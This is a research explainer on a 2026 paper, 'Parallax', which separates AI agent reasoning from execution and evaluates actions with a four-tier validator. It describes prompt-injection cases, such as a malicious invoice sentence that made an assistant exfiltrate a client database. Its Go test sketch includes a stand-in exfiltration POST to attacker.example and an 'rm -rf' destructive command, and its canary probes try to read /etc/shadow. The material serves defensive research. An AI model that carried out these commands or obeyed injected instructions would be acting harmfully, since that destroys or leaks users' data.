Research Explainer · Fokou (2026)
A new security paradigm structurally prevents AI reasoning systems from executing actions, interposing an independent four-tier validator that blocks 98.9% of adversarial attacks with zero false positives, even when the agent is fully compromised.
Published April 2026
98.9% of adversarial attacks blocked under default configuration with zero false positives across 280 test cases
100% attack block rate under maximum-security configuration (at the cost of 36% false positives)
73.6% of attacks resolved by fully deterministic mechanisms (Tiers 0 and 1) with no LLM dependency whatsoever
0% protection from prompt guardrails when the reasoning system is compromised, because they exist only inside the compromised system
The prompt guardrail fallacy
Most AI agent safety today works like this: you write instructions in the system prompt telling the model not to do dangerous things. The model processes those instructions through the same attention mechanism it uses to process the adversary's attack. This is, as Fokou puts it, like asking a user to follow a security policy instead of enforcing it at the operating system level.
The numbers make the case sharply. Documented prompt injection attempts against enterprise AI systems increased 340% year-over-year in late 2025, with indirect attacks (hidden in documents, emails, and API responses the agent ingests) now accounting for over 55% of incidents and achieving 20–30% higher success rates than direct injection. In multi-agent deployments, a single prompt injection incident propagates to 48% of co-running agents. A Fortune 500 company lost its client database because one malicious sentence in a vendor invoice instructed the internal AI assistant to forward the database to an external server.
Prompt guardrails also degrade under extended context (salami-slicing attacks gradually shift the model's constraint boundary over dozens of interactions), cannot survive multi-agent propagation (one compromised agent's output becomes the next agent's input), and are architecturally identical to the threats they attempt to stop. When the reasoning system is compromised, guardrails provide exactly zero protection, because they exist only inside the thing that's been compromised.
Fokou (2026), Table 4. Distribution of 280 blocked adversarial attacks by the Shield tier that resolved each one. Deterministic mechanisms (Tiers 0 and 1) handle nearly three-quarters of all attacks without any LLM call.
Fokou (2026), Table 5. Median (P50), 95th-percentile, and 99th-percentile latency in milliseconds for each Shield tier. Tier 0 resolves in sub-millisecond time; Tier 1's current 1.9s P50 is dominated by ONNX runtime initialization overhead, expected to drop to sub-50ms after optimization.
The four principles of Parallax
Parallax is not a framework or a library. It is a paradigm: a set of architectural principles any conforming implementation must satisfy, regardless of the AI architecture underneath. The core insight borrows from decades of systems security: the system that reasons about actions must be structurally unable to execute them, and the system that executes actions must be structurally unable to reason about them. Four principles make this concrete.
Together, these four principles prevent harmful execution, detect context-dependent threats, and recover from residual failures: the system that reasons runs in a separate OS process from the system that executes; every proposed action is evaluated by Shield, a four-tier validator that assumes the agent is already compromised; information flow control tracks the sensitivity of data moving through actions; and Chronicle captures state so residual failures can be rolled back.
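To make the first two principles concrete, here is a minimal Go sketch of the reason/execute split with an interposed validator. The names (ProposedAction, Verdict, Shield, Execute) and the tier logic are illustrative stand-ins for this explainer, not the OpenParallax API.

```go
// Sketch of the reason/execute split. All names are illustrative, not taken
// from OpenParallax: the point is that the reasoning side can only construct
// proposals, and nothing it holds is capable of execution.
package main

import (
	"errors"
	"fmt"
	"strings"
)

// ProposedAction is the only thing the untrusted reasoning process can emit.
type ProposedAction struct {
	Tool string
	Args map[string]string
}

// Verdict is returned by the trusted validator.
type Verdict struct {
	Allowed bool
	Tier    int // which tier resolved the decision
	Reason  string
}

// Shield stands in for the four-tier validator. Only the engine process
// holds a reference to it; the agent process never sees the executors.
type Shield struct {
	blockedTools map[string]bool // Tier 0: deterministic deny-list
}

func (s *Shield) Evaluate(a ProposedAction) Verdict {
	// Tier 0: hard, deterministic rules with no LLM involvement.
	if s.blockedTools[a.Tool] {
		return Verdict{Allowed: false, Tier: 0, Reason: "tool on deny-list"}
	}
	// Tier 1 stand-in: a trivial pattern check where the real system runs
	// its classifier.
	for _, v := range a.Args {
		if strings.Contains(v, "rm -rf /") {
			return Verdict{Allowed: false, Tier: 1, Reason: "destructive pattern"}
		}
	}
	// The remaining tiers (including the Tier 2 evaluator) would sit here;
	// this toy version simply allows whatever the rules above did not catch.
	return Verdict{Allowed: true, Tier: 2, Reason: "no deterministic rule violated"}
}

// Execute lives only inside the trusted engine and runs only after a Verdict.
func Execute(a ProposedAction, v Verdict) error {
	if !v.Allowed {
		return errors.New("blocked: " + v.Reason)
	}
	fmt.Printf("executing %s %v\n", a.Tool, a.Args)
	return nil
}

func main() {
	shield := &Shield{blockedTools: map[string]bool{"delete_database": true}}
	proposal := ProposedAction{Tool: "delete_database"}
	if err := Execute(proposal, shield.Evaluate(proposal)); err != nil {
		fmt.Println(err) // blocked: tool on deny-list
	}
}
```

The toy rules are beside the point; the shape is what matters. Nothing on the reasoning side holds a reference to Execute, so even a fully compromised conversation loop can only ask.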
Assume-Compromise Evaluation: testing the wall, not the model
The evaluation methodology is as important as the results. Fokou introduces Assume-Compromise Evaluation, which bypasses the LLM reasoning system entirely and injects tool calls programmatically into the Shield pipeline. This simulates a fully compromised agent proposing arbitrary harmful actions with no mediation from safety training, prompt guardrails, or model refusal.
Why not just test with an actual model? Because current frontier models are too good at refusing. In preliminary runs, Claude Sonnet 4.6, Claude Haiku 4.5, and Llama 3.1 8B all achieved 0% attack success across every configuration. The models simply refused to propose harmful tool calls, making it impossible to differentiate between protected and unprotected setups. A quick test with the smaller Qwen 2.5 3B confirmed that less safety-trained models do comply with harmful requests, validating the fully-compromised assumption as realistic rather than academic.
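A sketch of what that harness looks like, with a hypothetical Validator interface and a toy case list standing in for the paper's 280-case suite: adversarial tool calls are constructed directly in code and fed to the validator, so the measurement never depends on whether a model is willing to propose them.

```go
// Sketch of Assume-Compromise Evaluation: adversarial tool calls are
// injected programmatically, bypassing any LLM reasoning or refusal.
// The Validator interface, the toyShield, and the cases are illustrative
// placeholders, not the paper's actual harness or test suite.
package main

import "fmt"

type ToolCall struct {
	Category string // e.g. "data_exfiltration", "file_destruction"
	Tool     string
	Args     map[string]string
}

// Validator is whatever Shield implementation is under test.
type Validator interface {
	Blocks(ToolCall) bool
}

// toyShield blocks everything except a single allow-listed read-only tool.
type toyShield struct{}

func (toyShield) Blocks(c ToolCall) bool { return c.Tool != "read_file" }

func main() {
	// A fully compromised agent is simulated by proposing harmful calls directly.
	cases := []ToolCall{
		{Category: "data_exfiltration", Tool: "http_post",
			Args: map[string]string{"url": "https://attacker.example/collect"}},
		{Category: "file_destruction", Tool: "shell",
			Args: map[string]string{"cmd": "rm -rf /var/data"}},
		{Category: "benign_control", Tool: "read_file",
			Args: map[string]string{"path": "notes.txt"}},
	}

	var shield Validator = toyShield{}
	var blocked, falsePositives int
	for _, c := range cases {
		hit := shield.Blocks(c)
		switch {
		case c.Category == "benign_control" && hit:
			falsePositives++ // a legitimate action was wrongly refused
		case c.Category != "benign_control" && hit:
			blocked++
		}
	}
	fmt.Printf("blocked %d adversarial calls, %d false positives\n", blocked, falsePositives)
}
```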
Across 280 adversarial cases in nine attack categories, the default Parallax configuration blocked 277 attacks (98.9%) with zero false positives. The three that slipped through were Tier 2 evaluator judgment calls on genuinely ambiguous actions: a /tmp file deletion, an HTTP POST to a plausible validation endpoint, and an env command classified as read-only. The maximum-security configuration (running the DeBERTa classifier on all action types) caught all 280 at the cost of a 36% false positive rate. The classifier bypass list is the tunable dial between these two profiles.
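That dial can be pictured as a single configuration field: which action types are allowed to skip the classifier. The field names, profile names, and bypass entries below are assumptions made for illustration, not OpenParallax's actual configuration schema.

```go
// Sketch of the tunable dial between the default and maximum-security
// profiles. Field names, profile names, and bypass entries are assumptions
// for illustration, not the actual OpenParallax configuration.
package main

import "fmt"

type ShieldConfig struct {
	// Action types that skip the DeBERTa classifier. A longer list means
	// fewer false positives on structured payloads, but more reliance on
	// the deterministic tiers and the evaluator.
	ClassifierBypass []string
}

// DefaultProfile corresponds to the 98.9% block rate with zero false positives.
func DefaultProfile() ShieldConfig {
	return ShieldConfig{ClassifierBypass: []string{"file_write", "http_body"}}
}

// MaxSecurityProfile runs the classifier on every action type: all 280
// attacks blocked in the paper's evaluation, at a 36% false-positive cost.
func MaxSecurityProfile() ShieldConfig {
	return ShieldConfig{ClassifierBypass: nil}
}

func main() {
	fmt.Println("default bypass list:     ", DefaultProfile().ClassifierBypass)
	fmt.Println("max-security bypass list:", MaxSecurityProfile().ClassifierBypass)
}
```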
OpenParallax: the reference implementation
The paradigm is realized as OpenParallax, an open-source Go implementation that compiles to a single 80 MB binary with no runtime dependencies. It decomposes the agent into three OS-level processes: a process manager, an engine process (trusted, hosting Shield and all executors), and an agent process (untrusted, sandboxed, hosting only the LLM conversation loop). Communication is limited to a gRPC channel on a dynamically assigned port. The processes have separate address spaces, separate file descriptor tables, and no shared memory.
Several engineering decisions stand out. Sandbox integrity is verified at startup through canary probes that should fail under correct sandboxing: if any probe succeeds (writing a file, reading a host file, opening an unauthorized network connection), the system refuses to start. A hardcoded self-protection layer in compiled Go code blocks writes to core configuration files before any policy tier is even consulted, with no override mechanism and no API surface. Dynamic Tool Surface Reduction means the agent only sees tools it explicitly loads for the current task via a single meta-tool (load_tools). If a text summarization task loads zero tool groups, there is literally no execution surface to exploit.
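The canary-probe idea is simple enough to sketch directly: each probe attempts an operation the sandbox must forbid, and startup aborts if any probe succeeds. The probe choices and paths here are illustrative guesses, not the actual OpenParallax probe set.

```go
// Sketch of startup canary probes: each probe attempts an operation the
// sandbox is supposed to forbid, so a *successful* probe means the sandbox
// is broken and the process must refuse to start. Probe choices and paths
// are illustrative, not the actual OpenParallax probe set.
package main

import (
	"fmt"
	"net"
	"os"
	"time"
)

type probe struct {
	name string
	run  func() error // must return a non-nil error under correct sandboxing
}

func verifySandbox() error {
	probes := []probe{
		{"write outside sandbox", func() error {
			f, err := os.OpenFile("/etc/parallax-canary", os.O_CREATE|os.O_WRONLY, 0o600)
			if err == nil {
				f.Close()
				os.Remove("/etc/parallax-canary")
			}
			return err
		}},
		{"read host file", func() error {
			_, err := os.ReadFile("/etc/shadow")
			return err
		}},
		{"open outbound connection", func() error {
			conn, err := net.DialTimeout("tcp", "203.0.113.1:443", 500*time.Millisecond)
			if err == nil {
				conn.Close()
			}
			return err
		}},
	}
	for _, p := range probes {
		if p.run() == nil {
			return fmt.Errorf("sandbox integrity check failed: %q succeeded", p.name)
		}
	}
	return nil
}

func main() {
	if err := verifySandbox(); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1) // refuse to start if the sandbox does not hold
	}
	fmt.Println("sandbox verified; starting agent loop")
}
```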
The paper is candid about limitations. The DeBERTa classifier was trained on prompt injection text, not agent action payloads, explaining the systematic false positives on structured content like file writes and HTTP request bodies. Tier 1 latency (1.9s P50) is dominated by ONNX runtime initialization overhead and expected to drop to sub-50ms. Chronicle cannot reverse actions with external side effects. And the engine process is a single trust anchor: if it is compromised through a supply chain attack, the entire model fails. These are honest constraints, not architectural flaws.
Why this matters now
The paper's most pointed argument is that current model-level safety creates complacency. Frontier models refuse harmful requests so reliably that prompt guardrails appear to work. But model-level safety is baked in by training, and the model's reasoning is precisely the computational substrate that adversaries attack. Novel jailbreaks, less safety-trained models, indirect injection through ingested content, and memory poisoning all target the reasoning layer. When that layer falls, every prompt-based defense falls with it.
Parallax is explicitly positioned as insurance, not replacement. It complements RLHF, Constitutional AI, and output filtering by adding a layer that holds when those mechanisms fail. The analogy to operating system security is apt: you do not rely on applications to police themselves when you can enforce constraints at the kernel level. The principles are also deliberately intelligence-agnostic. Shield evaluates actions, not the reasoning architecture that produced them. Whether future agents use autoregressive transformers, reinforcement learning policies, neurosymbolic engines, or something not yet invented, the fundamental risk is the same: an autonomous system will occasionally propose harmful actions, and the architecture must prevent them regardless of cause.
The paper extends this logic to embodied systems, noting that Asimov's Laws of Robotics were behavioral rules interpreted by a reasoning system, and that Asimov spent decades of fiction exploring why such rules fail. Parallax proposes the engineering alternative: the robot cannot violate its safety constraints not because it chooses not to, but because it lacks the mechanism to do so. That is a more comfortable foundation for a world filling up with agents that can act on it.
BOTTOM LINE
Parallax makes a simple, powerful claim: the AI that thinks must never be the AI that acts. By enforcing process-level separation between reasoning and execution, interposing a four-tier validator that assumes the agent is always compromised, tracking data sensitivity through information flow control, and capturing state for rollback, the paradigm blocks 98.9% of adversarial attacks with zero false positives in its default configuration. The approach is architecture-agnostic, complementary to model-level safety training, and, importantly, honest about what it cannot do. It is insurance for the day the reasoning layer fails.
Reference
Fokou, J. (2026). Parallax: Why AI Agents That Think Must Never Act: A Paradigm for Architecturally Safe Autonomous Execution. arXiv preprint arXiv:2604.12986v1. https://arxiv.org/abs/2604.12986